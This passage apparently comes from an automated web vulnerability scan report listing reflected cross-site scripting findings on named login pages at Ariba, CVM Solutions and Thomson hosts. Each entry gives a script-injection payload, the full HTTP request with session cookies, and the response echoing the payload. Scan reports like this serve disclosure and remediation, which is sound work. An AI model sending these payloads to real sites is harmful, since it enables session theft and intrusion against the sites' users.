User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/AC
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 231
Date: Tue, 18 Oct 2011 18:11:13 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com1fd54";alert(1)//dfb25cd5db685531b/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/";
       </SCRIPT>
...[SNIP]...

1.19. https://connect.ariba.com/ASP/Login/AClogin.asp [BaseURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the BaseURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d315b"%3balert(1)//0cdfa14123c was submitted in the BaseURL parameter. This input was echoed as d315b";alert(1)//0cdfa14123c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.comd315b"%3balert(1)//0cdfa14123c&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/ HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 225
Date: Tue, 18 Oct 2011 18:11:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.comd315b";alert(1)//0cdfa14123c/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/";
       </SCRIPT>
...[SNIP]...

1.20. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload 1086f<script>alert(1)</script>1d31d8de98032848c was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/1086f<script>alert(1)</script>1d31d8de98032848c&txtUserName=&prefix=ext_&txtPassword=&submit1=Login HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://connect.ariba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/AC
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 291
Date: Tue, 18 Oct 2011 18:11:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/1086f<script>alert(1)</script>1d31d8de98032848c    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsEr
...[SNIP]...

1.21. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload 943b7<script>alert(1)</script>8ca96b5b20 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/943b7<script>alert(1)</script>8ca96b5b20 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 277
Date: Tue, 18 Oct 2011 18:11:22 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/943b7<script>alert(1)</script>8ca96b5b20    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&
...[SNIP]...

1.22. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the sc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 352dc"%3balert(1)//94c491ca4d9 was submitted in the sc parameter. This input was echoed as 352dc";alert(1)//94c491ca4d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/352dc"%3balert(1)//94c491ca4d9 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 253
Date: Tue, 18 Oct 2011 18:11:20 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/352dc";alert(1)//94c491ca4d9    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/352dc";alert(1)//94c491ca4d9";
       </SCRIPT>
...[SNIP]...

1.23. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the sc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8e2c"%3balert(1)//26a07ecc2f93fd1f3 was submitted in the sc parameter. This input was echoed as e8e2c";alert(1)//26a07ecc2f93fd1f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/e8e2c"%3balert(1)//26a07ecc2f93fd1f3&txtUserName=&prefix=ext_&txtPassword=&submit1=Login HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://connect.ariba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/AC
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 265
Date: Tue, 18 Oct 2011 18:11:20 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/e8e2c";alert(1)//26a07ecc2f93fd1f3    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/e8e2c";alert(1)//26a07ecc2f93fd1f3";
       </SCRIPT>
...[SNIP]...

1.24. https://connect.ariba.com/ASP/Login/AClogin.asp [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33e77"%3balert(1)//cbbd67af68b was submitted in the u parameter. This input was echoed as 33e77";alert(1)//cbbd67af68b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a33e77"%3balert(1)//cbbd67af68b&sc=AC_Home_Page/ HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 234
Date: Tue, 18 Oct 2011 18:11:17 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/home/1,1009,45,00.html    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&u=a33e77";alert(1)//cbbd67af68b&sc=AC_Home_Page/";
       </SCRIPT>
...[SNIP]...

1.25. https://connect.ariba.com/ASP/Login/AClogin.asp [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9080"%3balert(1)//fae7de21ea471ed0d was submitted in the u parameter. This input was echoed as b9080";alert(1)//fae7de21ea471ed0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=ab9080"%3balert(1)//fae7de21ea471ed0d&sc=AC_Home_Page/&txtUserName=&prefix=ext_&txtPassword=&submit1=Login HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://connect.ariba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/AC
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 240
Date: Tue, 18 Oct 2011 18:11:16 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/home/1,1009,45,00.html    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&u=ab9080";alert(1)//fae7de21ea471ed0d&sc=AC_Home_Page/";
       </SCRIPT>
...[SNIP]...

1.26. https://cvmas13.cvmsolutions.com/gd/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cvmas13.cvmsolutions.com
Path:   /gd/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57765"><script>alert(1)</script>cb3cba300c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gd/?57765"><script>alert(1)</script>cb3cba300c5=1 HTTP/1.1
Host: cvmas13.cvmsolutions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=reuters+supplier#q=supplier+registration&hl=en&tbo=1&prmd=imvns&ei=M6WdTpv5BKjniAK1j5HXCQ&start=10&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=67ad93a5206fb0d0&biw=1206&bih=911
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:51:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31771
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<HTML xmlns:ntb>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=ISO 8859-1">
<TITLE>General Dynamics - Sup
...[SNIP]...
<form method="post" action="default.asp?57765"><script>alert(1)</script>cb3cba300c5=1" name="x_LoginForm" ID="Form1">
...[SNIP]...

1.27. http://kbportal.thomson.com/display/2/loginSecure.aspx [catURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the catURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf7e3"><script>alert(1)</script>b7fec3d043 was submitted in the catURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=&aid=&searchstring=&searchtype=&searchby=&cat=&catURL=cf7e3"><script>alert(1)</script>b7fec3d043 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2082


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="catURL" value="cf7e3"><script>alert(1)</script>b7fec3d043">
...[SNIP]...

1.28. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchby parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the searchby request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd5dd"><script>alert(1)</script>9850b6a53d3 was submitted in the searchby parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=&aid=&searchstring=&searchtype=&searchby=fd5dd"><script>alert(1)</script>9850b6a53d3&cat=&catURL= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2083


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="searchby" value="fd5dd"><script>alert(1)</script>9850b6a53d3">
...[SNIP]...

1.29. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchstring parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the searchstring request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d027e"><script>alert(1)</script>802d14f2218 was submitted in the searchstring parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=&aid=&searchstring=d027e"><script>alert(1)</script>802d14f2218&searchtype=&searchby=&cat=&catURL= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2083


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="searchstring" value="d027e"><script>alert(1)</script>802d14f2218">
...[SNIP]...

1.30. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the searchtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1aa7"><script>alert(1)</script>d1bc6a57430 was submitted in the searchtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=&aid=&searchstring=&searchtype=e1aa7"><script>alert(1)</script>d1bc6a57430&searchby=&cat=&catURL= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
